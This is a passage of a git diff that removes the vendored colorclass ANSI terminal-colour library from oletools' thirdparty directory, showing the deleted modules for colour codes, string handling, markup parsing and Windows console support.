- '/hibgmagenta': 49, '/hibgcyan': 49, '/hibgwhite': 49,
-
- '/autored': 39, '/autoblack': 39, '/automagenta': 39, '/autowhite': 39, '/autoblue': 39, '/autoyellow': 39,
- '/autogreen': 39, '/autocyan': 39,
-
- '/autobgred': 49, '/autobgblack': 49, '/autobgmagenta': 49, '/autobgwhite': 49, '/autobgblue': 49,
- '/autobgyellow': 49, '/autobggreen': 49, '/autobgcyan': 49,
-}
-
-
-class ANSICodeMapping(Mapping):
- """Read-only dictionary, resolves closing tags and automatic colors. Iterates only used color tags.
-
- :cvar bool DISABLE_COLORS: Disable colors (strip color codes).
- :cvar bool LIGHT_BACKGROUND: Use low intensity color codes.
- """
-
- DISABLE_COLORS = False
- LIGHT_BACKGROUND = False
-
- def __init__(self, value_markup):
- """Constructor.
-
- :param str value_markup: String with {color} tags.
- """
- self.whitelist = [k for k in BASE_CODES if '{' + k + '}' in value_markup]
-
- def __getitem__(self, item):
- """Return value for key or None if colors are disabled.
-
- :param str item: Key.
-
- :return: Color code integer.
- :rtype: int
- """
- if item not in self.whitelist:
- raise KeyError(item)
- if self.DISABLE_COLORS:
- return None
- return getattr(self, item, BASE_CODES[item])
-
- def __iter__(self):
- """Iterate dictionary."""
- return iter(self.whitelist)
-
- def __len__(self):
- """Dictionary length."""
- return len(self.whitelist)
-
- @classmethod
- def disable_all_colors(cls):
- """Disable all colors. Strips any color tags or codes."""
- cls.DISABLE_COLORS = True
-
- @classmethod
- def enable_all_colors(cls):
- """Enable all colors. Strips any color tags or codes."""
- cls.DISABLE_COLORS = False
-
- @classmethod
- def disable_if_no_tty(cls):
- """Disable all colors only if there is no TTY available.
-
- :return: True if colors are disabled, False if stderr or stdout is a TTY.
- :rtype: bool
- """
- if sys.stdout.isatty() or sys.stderr.isatty():
- return False
- cls.disable_all_colors()
- return True
-
- @classmethod
- def set_dark_background(cls):
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- cls.LIGHT_BACKGROUND = False
-
- @classmethod
- def set_light_background(cls):
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- cls.LIGHT_BACKGROUND = True
-
- @property
- def autoblack(self):
- """Return automatic black foreground color depending on background color."""
- return BASE_CODES['black' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiblack']
-
- @property
- def autored(self):
- """Return automatic red foreground color depending on background color."""
- return BASE_CODES['red' if ANSICodeMapping.LIGHT_BACKGROUND else 'hired']
-
- @property
- def autogreen(self):
- """Return automatic green foreground color depending on background color."""
- return BASE_CODES['green' if ANSICodeMapping.LIGHT_BACKGROUND else 'higreen']
-
- @property
- def autoyellow(self):
- """Return automatic yellow foreground color depending on background color."""
- return BASE_CODES['yellow' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiyellow']
-
- @property
- def autoblue(self):
- """Return automatic blue foreground color depending on background color."""
- return BASE_CODES['blue' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiblue']
-
- @property
- def automagenta(self):
- """Return automatic magenta foreground color depending on background color."""
- return BASE_CODES['magenta' if ANSICodeMapping.LIGHT_BACKGROUND else 'himagenta']
-
- @property
- def autocyan(self):
- """Return automatic cyan foreground color depending on background color."""
- return BASE_CODES['cyan' if ANSICodeMapping.LIGHT_BACKGROUND else 'hicyan']
-
- @property
- def autowhite(self):
- """Return automatic white foreground color depending on background color."""
- return BASE_CODES['white' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiwhite']
-
- @property
- def autobgblack(self):
- """Return automatic black background color depending on background color."""
- return BASE_CODES['bgblack' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgblack']
-
- @property
- def autobgred(self):
- """Return automatic red background color depending on background color."""
- return BASE_CODES['bgred' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgred']
-
- @property
- def autobggreen(self):
- """Return automatic green background color depending on background color."""
- return BASE_CODES['bggreen' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibggreen']
-
- @property
- def autobgyellow(self):
- """Return automatic yellow background color depending on background color."""
- return BASE_CODES['bgyellow' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgyellow']
-
- @property
- def autobgblue(self):
- """Return automatic blue background color depending on background color."""
- return BASE_CODES['bgblue' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgblue']
-
- @property
- def autobgmagenta(self):
- """Return automatic magenta background color depending on background color."""
- return BASE_CODES['bgmagenta' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgmagenta']
-
- @property
- def autobgcyan(self):
- """Return automatic cyan background color depending on background color."""
- return BASE_CODES['bgcyan' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgcyan']
-
- @property
- def autobgwhite(self):
- """Return automatic white background color depending on background color."""
- return BASE_CODES['bgwhite' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgwhite']
-
-
-def list_tags():
- """List the available tags.
-
- :return: List of 4-item tuples: opening tag, closing tag, main ansi value, closing ansi value.
- :rtype: list
- """
- # Build reverse dictionary. Keys are closing tags, values are [closing ansi, opening tag, opening ansi].
- reverse_dict = dict()
- for tag, ansi in sorted(BASE_CODES.items()):
- if tag.startswith('/'):
- reverse_dict[tag] = [ansi, None, None]
- else:
- reverse_dict['/' + tag][1:] = [tag, ansi]
-
- # Collapse
- four_item_tuples = [(v[1], k, v[2], v[0]) for k, v in reverse_dict.items()]
-
- # Sort.
- def sorter(four_item):
- """Sort /all /fg /bg first, then b i u flash, then auto colors, then dark colors, finally light colors.
-
- :param iter four_item: [opening tag, closing tag, main ansi value, closing ansi value]
-
- :return Sorting weight.
- :rtype: int
- """
- if not four_item[2]: # /all /fg /bg
- return four_item[3] - 200
- if four_item[2] < 10 or four_item[0].startswith('auto'): # b f i u or auto colors
- return four_item[2] - 100
- return four_item[2]
- four_item_tuples.sort(key=sorter)
-
- return four_item_tuples
diff --git a/oletools/thirdparty/colorclass/color.py b/oletools/thirdparty/colorclass/color.py
deleted file mode 100644
index 2849d06b..00000000
--- a/oletools/thirdparty/colorclass/color.py
+++ /dev/null
@@ -1,220 +0,0 @@
-"""Color class used by library users."""
-
-from colorclass.core import ColorStr
-
-
-class Color(ColorStr):
- """Unicode (str in Python3) subclass with ANSI terminal text color support.
-
- Example syntax: Color('{red}Sample Text{/red}')
-
- Example without parsing logic: Color('{red}Sample Text{/red}', keep_tags=True)
-
- For a list of codes, call: colorclass.list_tags()
- """
-
- @classmethod
- def colorize(cls, color, string, auto=False):
- """Color-code entire string using specified color.
-
- :param str color: Color of string.
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- tag = '{0}{1}'.format('auto' if auto else '', color)
- return cls('{%s}%s{/%s}' % (tag, string, tag))
-
- @classmethod
- def black(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('black', string, auto=auto)
-
- @classmethod
- def bgblack(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgblack', string, auto=auto)
-
- @classmethod
- def red(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('red', string, auto=auto)
-
- @classmethod
- def bgred(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgred', string, auto=auto)
-
- @classmethod
- def green(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('green', string, auto=auto)
-
- @classmethod
- def bggreen(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bggreen', string, auto=auto)
-
- @classmethod
- def yellow(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('yellow', string, auto=auto)
-
- @classmethod
- def bgyellow(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgyellow', string, auto=auto)
-
- @classmethod
- def blue(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('blue', string, auto=auto)
-
- @classmethod
- def bgblue(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgblue', string, auto=auto)
-
- @classmethod
- def magenta(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('magenta', string, auto=auto)
-
- @classmethod
- def bgmagenta(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgmagenta', string, auto=auto)
-
- @classmethod
- def cyan(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('cyan', string, auto=auto)
-
- @classmethod
- def bgcyan(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgcyan', string, auto=auto)
-
- @classmethod
- def white(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('white', string, auto=auto)
-
- @classmethod
- def bgwhite(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgwhite', string, auto=auto)
diff --git a/oletools/thirdparty/colorclass/core.py b/oletools/thirdparty/colorclass/core.py
deleted file mode 100644
index 481bb405..00000000
--- a/oletools/thirdparty/colorclass/core.py
+++ /dev/null
@@ -1,342 +0,0 @@
-"""String subclass that handles ANSI color codes."""
-
-from colorclass.codes import ANSICodeMapping
-from colorclass.parse import parse_input, RE_SPLIT
-from colorclass.search import build_color_index, find_char_color
-
-PARENT_CLASS = type(u'')
-
-
-def apply_text(incoming, func):
- """Call `func` on text portions of incoming color string.
-
- :param iter incoming: Incoming string/ColorStr/string-like object to iterate.
- :param func: Function to call with string portion as first and only parameter.
-
- :return: Modified string, same class type as incoming string.
- """
- split = RE_SPLIT.split(incoming)
- for i, item in enumerate(split):
- if not item or RE_SPLIT.match(item):
- continue
- split[i] = func(item)
- return incoming.__class__().join(split)
-
-
-class ColorBytes(bytes):
- """Str (bytes in Python3) subclass, .decode() overridden to return unicode (str in Python3) subclass instance."""
-
- def __new__(cls, *args, **kwargs):
- """Save original class so decode() returns an instance of it."""
- original_class = kwargs.pop('original_class')
- combined_args = [cls] + list(args)
- instance = bytes.__new__(*combined_args, **kwargs)
- instance.original_class = original_class
- return instance
-
- def decode(self, encoding='utf-8', errors='strict'):
- """Decode using the codec registered for encoding. Default encoding is 'utf-8'.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeDecodeError. Other possible values are 'ignore' and 'replace' as well as any other name
- registered with codecs.register_error that is able to handle UnicodeDecodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- original_class = getattr(self, 'original_class')
- return original_class(super(ColorBytes, self).decode(encoding, errors))
-
-
-class ColorStr(PARENT_CLASS):
- """Core color class."""
-
- def __new__(cls, *args, **kwargs):
- """Parse color markup and instantiate."""
- keep_tags = kwargs.pop('keep_tags', False)
-
- # Parse string.
- value_markup = args[0] if args else PARENT_CLASS() # e.g. '{red}test{/red}'
- value_colors, value_no_colors = parse_input(value_markup, ANSICodeMapping.DISABLE_COLORS, keep_tags)
- color_index = build_color_index(value_colors)
-
- # Instantiate.
- color_args = [cls, value_colors] + list(args[1:])
- instance = PARENT_CLASS.__new__(*color_args, **kwargs)
-
- # Add additional attributes and return.
- instance.value_colors = value_colors
- instance.value_no_colors = value_no_colors
- instance.has_colors = value_colors != value_no_colors
- instance.color_index = color_index
- return instance
-
- def __add__(self, other):
- """Concatenate."""
- return self.__class__(self.value_colors + other, keep_tags=True)
-
- def __getitem__(self, item):
- """Retrieve character."""
- try:
- color_pos = self.color_index[int(item)]
- except TypeError: # slice
- return super(ColorStr, self).__getitem__(item)
- return self.__class__(find_char_color(self.value_colors, color_pos), keep_tags=True)
-
- def __iter__(self):
- """Yield one color-coded character at a time."""
- for color_pos in self.color_index:
- yield self.__class__(find_char_color(self.value_colors, color_pos))
-
- def __len__(self):
- """Length of string without color codes (what users expect)."""
- return self.value_no_colors.__len__()
-
- def __mod__(self, other):
- """String substitution (like printf)."""
- return self.__class__(self.value_colors % other, keep_tags=True)
-
- def __mul__(self, other):
- """Multiply string."""
- return self.__class__(self.value_colors * other, keep_tags=True)
-
- def __repr__(self):
- """Representation of a class instance (like datetime.datetime.now())."""
- return '{name}({value})'.format(name=self.__class__.__name__, value=repr(self.value_colors))
-
- def capitalize(self):
- """Return a copy of the string with only its first character capitalized."""
- return apply_text(self, lambda s: s.capitalize())
-
- def center(self, width, fillchar=None):
- """Return centered in a string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.center(width, fillchar)
- else:
- result = self.value_no_colors.center(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def count(self, sub, start=0, end=-1):
- """Return the number of non-overlapping occurrences of substring sub in string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.count(sub, start, end)
-
- def endswith(self, suffix, start=0, end=None):
- """Return True if ends with the specified suffix, False otherwise.
-
- With optional start, test beginning at that position. With optional end, stop comparing at that position.
- suffix can also be a tuple of strings to try.
-
- :param str suffix: Suffix to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- args = [suffix, start] + ([] if end is None else [end])
- return self.value_no_colors.endswith(*args)
-
- def encode(self, encoding=None, errors='strict'):
- """Encode using the codec registered for encoding. encoding defaults to the default encoding.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and 'xmlcharrefreplace' as well as any
- other name registered with codecs.register_error that is able to handle UnicodeEncodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- return ColorBytes(super(ColorStr, self).encode(encoding, errors), original_class=self.__class__)
-
- def decode(self, encoding=None, errors='strict'):
- """Decode using the codec registered for encoding. encoding defaults to the default encoding.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeDecodeError. Other possible values are 'ignore' and 'replace' as well as any other name
- registered with codecs.register_error that is able to handle UnicodeDecodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- return self.__class__(super(ColorStr, self).decode(encoding, errors), keep_tags=True)
-
- def find(self, sub, start=None, end=None):
- """Return the lowest index where substring sub is found, such that sub is contained within string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.find(sub, start, end)
-
- def format(self, *args, **kwargs):
- """Return a formatted version, using substitutions from args and kwargs.
-
- The substitutions are identified by braces ('{' and '}').
- """
- return self.__class__(super(ColorStr, self).format(*args, **kwargs), keep_tags=True)
-
- def index(self, sub, start=None, end=None):
- """Like S.find() but raise ValueError when the substring is not found.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.index(sub, start, end)
-
- def isalnum(self):
- """Return True if all characters in string are alphanumeric and there is at least one character in it."""
- return self.value_no_colors.isalnum()
-
- def isalpha(self):
- """Return True if all characters in string are alphabetic and there is at least one character in it."""
- return self.value_no_colors.isalpha()
-
- def isdecimal(self):
- """Return True if there are only decimal characters in string, False otherwise."""
- return self.value_no_colors.isdecimal()
-
- def isdigit(self):
- """Return True if all characters in string are digits and there is at least one character in it."""
- return self.value_no_colors.isdigit()
-
- def isnumeric(self):
- """Return True if there are only numeric characters in string, False otherwise."""
- return self.value_no_colors.isnumeric()
-
- def isspace(self):
- """Return True if all characters in string are whitespace and there is at least one character in it."""
- return self.value_no_colors.isspace()
-
- def istitle(self):
- """Return True if string is a titlecased string and there is at least one character in it.
-
- That is uppercase characters may only follow uncased characters and lowercase characters only cased ones. Return
- False otherwise.
- """
- return self.value_no_colors.istitle()
-
- def isupper(self):
- """Return True if all cased characters are uppercase and there is at least one cased character in it."""
- return self.value_no_colors.isupper()
-
- def join(self, iterable):
- """Return a string which is the concatenation of the strings in the iterable.
-
- :param iterable: Join items in this iterable.
- """
- return self.__class__(super(ColorStr, self).join(iterable), keep_tags=True)
-
- def ljust(self, width, fillchar=None):
- """Return left-justified string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.ljust(width, fillchar)
- else:
- result = self.value_no_colors.ljust(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def rfind(self, sub, start=None, end=None):
- """Return the highest index where substring sub is found, such that sub is contained within string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.rfind(sub, start, end)
-
- def rindex(self, sub, start=None, end=None):
- """Like .rfind() but raise ValueError when the substring is not found.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.rindex(sub, start, end)
-
- def rjust(self, width, fillchar=None):
- """Return right-justified string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.rjust(width, fillchar)
- else:
- result = self.value_no_colors.rjust(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def splitlines(self, keepends=False):
- """Return a list of the lines in the string, breaking at line boundaries.
-
- Line breaks are not included in the resulting list unless keepends is given and True.
-
- :param bool keepends: Include linebreaks.
- """
- return [self.__class__(l) for l in self.value_colors.splitlines(keepends)]
-
- def startswith(self, prefix, start=0, end=-1):
- """Return True if string starts with the specified prefix, False otherwise.
-
- With optional start, test beginning at that position. With optional end, stop comparing at that position. prefix
- can also be a tuple of strings to try.
-
- :param str prefix: Prefix to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.startswith(prefix, start, end)
-
- def swapcase(self):
- """Return a copy of the string with uppercase characters converted to lowercase and vice versa."""
- return apply_text(self, lambda s: s.swapcase())
-
- def title(self):
- """Return a titlecased version of the string.
-
- That is words start with uppercase characters, all remaining cased characters have lowercase.
- """
- return apply_text(self, lambda s: s.title())
-
- def translate(self, table):
- """Return a copy of the string, where all characters have been mapped through the given translation table.
-
- Table must be a mapping of Unicode ordinals to Unicode ordinals, strings, or None. Unmapped characters are left
- untouched. Characters mapped to None are deleted.
-
- :param table: Translation table.
- """
- return apply_text(self, lambda s: s.translate(table))
-
- def upper(self):
- """Return a copy of the string converted to uppercase."""
- return apply_text(self, lambda s: s.upper())
-
- def zfill(self, width):
- """Pad a numeric string with zeros on the left, to fill a field of the specified width.
-
- The string is never truncated.
-
- :param int width: Length of output string.
- """
- if not self.value_no_colors:
- result = self.value_no_colors.zfill(width)
- else:
- result = self.value_colors.replace(self.value_no_colors, self.value_no_colors.zfill(width))
- return self.__class__(result, keep_tags=True)
diff --git a/oletools/thirdparty/colorclass/parse.py b/oletools/thirdparty/colorclass/parse.py
deleted file mode 100644
index 46dc28e3..00000000
--- a/oletools/thirdparty/colorclass/parse.py
+++ /dev/null
@@ -1,96 +0,0 @@
-"""Parse color markup tags into ANSI escape sequences."""
-
-import re
-
-from colorclass.codes import ANSICodeMapping, BASE_CODES
-
-CODE_GROUPS = (
- tuple(set(str(i) for i in BASE_CODES.values() if i and (40 <= i <= 49 or 100 <= i <= 109))), # bg colors
- tuple(set(str(i) for i in BASE_CODES.values() if i and (30 <= i <= 39 or 90 <= i <= 99))), # fg colors
- ('1', '22'), ('2', '22'), ('3', '23'), ('4', '24'), ('5', '25'), ('6', '26'), ('7', '27'), ('8', '28'), ('9', '29'),
-)
-RE_ANSI = re.compile(r'(\033\[([\d;]+)m)')
-RE_COMBINE = re.compile(r'\033\[([\d;]+)m\033\[([\d;]+)m')
-RE_SPLIT = re.compile(r'(\033\[[\d;]+m)')
-
-
-def prune_overridden(ansi_string):
- """Remove color codes that are rendered ineffective by subsequent codes in one escape sequence then sort codes.
-
- :param str ansi_string: Incoming ansi_string with ANSI color codes.
-
- :return: Color string with pruned color sequences.
- :rtype: str
- """
- multi_seqs = set(p for p in RE_ANSI.findall(ansi_string) if ';' in p[1]) # Sequences with multiple color codes.
-
- for escape, codes in multi_seqs:
- r_codes = list(reversed(codes.split(';')))
-
- # Nuke everything before {/all}.
- try:
- r_codes = r_codes[:r_codes.index('0') + 1]
- except ValueError:
- pass
-
- # Thin out groups.
- for group in CODE_GROUPS:
- for pos in reversed([i for i, n in enumerate(r_codes) if n in group][1:]):
- r_codes.pop(pos)
-
- # Done.
- reduced_codes = ';'.join(sorted(r_codes, key=int))
- if codes != reduced_codes:
- ansi_string = ansi_string.replace(escape, '\033[' + reduced_codes + 'm')
-
- return ansi_string
-
-
-def parse_input(tagged_string, disable_colors, keep_tags):
- """Perform the actual conversion of tags to ANSI escaped codes.
-
- Provides a version of the input without any colors for len() and other methods.
-
- :param str tagged_string: The input unicode value.
- :param bool disable_colors: Strip all colors in both outputs.
- :param bool keep_tags: Skip parsing curly bracket tags into ANSI escape sequences.
-
- :return: 2-item tuple. First item is the parsed output. Second item is a version of the input without any colors.
- :rtype: tuple
- """
- codes = ANSICodeMapping(tagged_string)
- output_colors = getattr(tagged_string, 'value_colors', tagged_string)
-
- # Convert: '{b}{red}' -> '\033[1m\033[31m'
- if not keep_tags:
- for tag, replacement in (('{' + k + '}', '' if v is None else '\033[%dm' % v) for k, v in codes.items()):
- output_colors = output_colors.replace(tag, replacement)
-
- # Strip colors.
- output_no_colors = RE_ANSI.sub('', output_colors)
- if disable_colors:
- return output_no_colors, output_no_colors
-
- # Combine: '\033[1m\033[31m' -> '\033[1;31m'
- while True:
- simplified = RE_COMBINE.sub(r'\033[\1;\2m', output_colors)
- if simplified == output_colors:
- break
- output_colors = simplified
-
- # Prune: '\033[31;32;33;34;35m' -> '\033[35m'
- output_colors = prune_overridden(output_colors)
-
- # Deduplicate: '\033[1;mT\033[1;mE\033[1;mS\033[1;mT' -> '\033[1;mTEST'
- previous_escape = None
- segments = list()
- for item in (i for i in RE_SPLIT.split(output_colors) if i):
- if RE_SPLIT.match(item):
- if item != previous_escape:
- segments.append(item)
- previous_escape = item
- else:
- segments.append(item)
- output_colors = ''.join(segments)
-
- return output_colors, output_no_colors
diff --git a/oletools/thirdparty/colorclass/search.py b/oletools/thirdparty/colorclass/search.py
deleted file mode 100644
index 555402dc..00000000
--- a/oletools/thirdparty/colorclass/search.py
+++ /dev/null
@@ -1,49 +0,0 @@
-"""Determine color of characters that may or may not be adjacent to ANSI escape sequences."""
-
-from colorclass.parse import RE_SPLIT
-
-
-def build_color_index(ansi_string):
- """Build an index between visible characters and a string with invisible color codes.
-
- :param str ansi_string: String with color codes (ANSI escape sequences).
-
- :return: Position of visible characters in color string (indexes match non-color string).
- :rtype: tuple
- """
- mapping = list()
- color_offset = 0
- for item in (i for i in RE_SPLIT.split(ansi_string) if i):
- if RE_SPLIT.match(item):
- color_offset += len(item)
- else:
- for _ in range(len(item)):
- mapping.append(color_offset)
- color_offset += 1
- return tuple(mapping)
-
-
-def find_char_color(ansi_string, pos):
- """Determine what color a character is in the string.
-
- :param str ansi_string: String with color codes (ANSI escape sequences).
- :param int pos: Position of the character in the ansi_string.
-
- :return: Character along with all surrounding color codes.
- :rtype: str
- """
- result = list()
- position = 0 # Set to None when character is found.
- for item in (i for i in RE_SPLIT.split(ansi_string) if i):
- if RE_SPLIT.match(item):
- result.append(item)
- if position is not None:
- position += len(item)
- elif position is not None:
- for char in item:
- if position == pos:
- result.append(char)
- position = None
- break
- position += 1
- return ''.join(result)
diff --git a/oletools/thirdparty/colorclass/toggles.py b/oletools/thirdparty/colorclass/toggles.py
deleted file mode 100644
index 1ba6bce1..00000000
--- a/oletools/thirdparty/colorclass/toggles.py
+++ /dev/null
@@ -1,42 +0,0 @@
-"""Convenience functions to enable/disable features."""
-
-from colorclass.codes import ANSICodeMapping
-
-
-def disable_all_colors():
- """Disable all colors. Strip any color tags or codes."""
- ANSICodeMapping.disable_all_colors()
-
-
-def enable_all_colors():
- """Enable colors."""
- ANSICodeMapping.enable_all_colors()
-
-
-def disable_if_no_tty():
- """Disable all colors if there is no TTY available.
-
- :return: True if colors are disabled, False if stderr or stdout is a TTY.
- :rtype: bool
- """
- return ANSICodeMapping.disable_if_no_tty()
-
-
-def is_enabled():
- """Are colors enabled."""
- return not ANSICodeMapping.DISABLE_COLORS
-
-
-def set_light_background():
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- ANSICodeMapping.set_light_background()
-
-
-def set_dark_background():
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- ANSICodeMapping.set_dark_background()
-
-
-def is_light():
- """Are background colors for light backgrounds."""
- return ANSICodeMapping.LIGHT_BACKGROUND
diff --git a/oletools/thirdparty/colorclass/windows.py b/oletools/thirdparty/colorclass/windows.py
deleted file mode 100644
index 8f694783..00000000
--- a/oletools/thirdparty/colorclass/windows.py
+++ /dev/null
@@ -1,388 +0,0 @@
-"""Windows console screen buffer handlers."""
-
-from __future__ import print_function
-
-import atexit
-import ctypes
-import re
-import sys
-
-from colorclass.codes import ANSICodeMapping, BASE_CODES
-from colorclass.core import RE_SPLIT
-
-ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004
-INVALID_HANDLE_VALUE = -1
-IS_WINDOWS = sys.platform == 'win32'
-RE_NUMBER_SEARCH = re.compile(r'\033\[([\d;]+)m')
-STD_ERROR_HANDLE = -12
-STD_OUTPUT_HANDLE = -11
-WINDOWS_CODES = {
- '/all': -33, '/fg': -39, '/bg': -49,
-
- 'black': 0, 'red': 4, 'green': 2, 'yellow': 6, 'blue': 1, 'magenta': 5, 'cyan': 3, 'white': 7,
-
- 'bgblack': -8, 'bgred': 64, 'bggreen': 32, 'bgyellow': 96, 'bgblue': 16, 'bgmagenta': 80, 'bgcyan': 48,
- 'bgwhite': 112,
-
- 'hiblack': 8, 'hired': 12, 'higreen': 10, 'hiyellow': 14, 'hiblue': 9, 'himagenta': 13, 'hicyan': 11, 'hiwhite': 15,
-
- 'hibgblack': 128, 'hibgred': 192, 'hibggreen': 160, 'hibgyellow': 224, 'hibgblue': 144, 'hibgmagenta': 208,
- 'hibgcyan': 176, 'hibgwhite': 240,
-
- '/black': -39, '/red': -39, '/green': -39, '/yellow': -39, '/blue': -39, '/magenta': -39, '/cyan': -39,
- '/white': -39, '/hiblack': -39, '/hired': -39, '/higreen': -39, '/hiyellow': -39, '/hiblue': -39, '/himagenta': -39,
- '/hicyan': -39, '/hiwhite': -39,
-
- '/bgblack': -49, '/bgred': -49, '/bggreen': -49, '/bgyellow': -49, '/bgblue': -49, '/bgmagenta': -49,
- '/bgcyan': -49, '/bgwhite': -49, '/hibgblack': -49, '/hibgred': -49, '/hibggreen': -49, '/hibgyellow': -49,
- '/hibgblue': -49, '/hibgmagenta': -49, '/hibgcyan': -49, '/hibgwhite': -49,
-}
-
-
-class COORD(ctypes.Structure):
- """COORD structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms682119."""
-
- _fields_ = [
- ('X', ctypes.c_short),
- ('Y', ctypes.c_short),
- ]
-
-
-class SmallRECT(ctypes.Structure):
- """SMALL_RECT structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms686311."""
-
- _fields_ = [
- ('Left', ctypes.c_short),
- ('Top', ctypes.c_short),
- ('Right', ctypes.c_short),
- ('Bottom', ctypes.c_short),
- ]
-
-
-class ConsoleScreenBufferInfo(ctypes.Structure):
- """CONSOLE_SCREEN_BUFFER_INFO structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms682093."""
-
- _fields_ = [
